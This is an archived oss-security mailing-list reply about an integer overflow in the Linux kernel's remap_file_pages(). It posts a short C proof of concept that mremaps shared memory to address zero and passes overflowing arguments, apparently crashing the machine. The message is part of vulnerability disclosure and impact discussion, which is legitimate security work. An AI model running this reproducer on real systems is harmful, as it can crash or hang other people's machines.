'Re: [oss-security] kernel: avoid pgoff overflow in remap_file_pages'

[prev in list] [next in list] [prev in thread] [next in thread] 

List:       oss-security
Subject:    Re: [oss-security] kernel: avoid pgoff overflow in remap_file_pages
From:       akiphie <akiphie () lavabit ! com>
Date:       2010-10-12 18:27:39
Message-ID: 20101012182739.3560D11B926 () karen ! lavabit ! com
[Download RAW message or body]

On Tuesday 12 October 2010 09:19:29 Eugene Teo wrote:
> Thomas Pollet reported an integer overflow issue in remap_file_pages().
> While we are able to reproduce the issue, we are unable to find a
> security impact. If your views differ, do let us know.

This made my computer very sad :(

#include <sys/mman.h>
#include <unistd.h>
#include <sys/ipc.h>
#include <sys/shm.h>
                                                                                                \
 int main(int argc, char **argv)                                                                \
 {                                                                                              \
  int x = shmget(IPC_PRIVATE, 1, IPC_CREAT | IPC_EXCL | 0600);                                  \
  void *mem = shmat(x, NULL, 0);                                                                \
  mremap(mem, 0x1000, 0x1000, MREMAP_MAYMOVE | MREMAP_FIXED, 0x0);                              \
  remap_file_pages((void *) 0xfff, ~0UL, 0, -(~0UL >> 12), 0);                                  \
  return 0;                                                                                     \
 }                                                                                              \


--
cnu


[prev in list] [next in list] [prev in thread] [next in thread]
Configure | About | News | Add a list | Sponsored by KoreLogic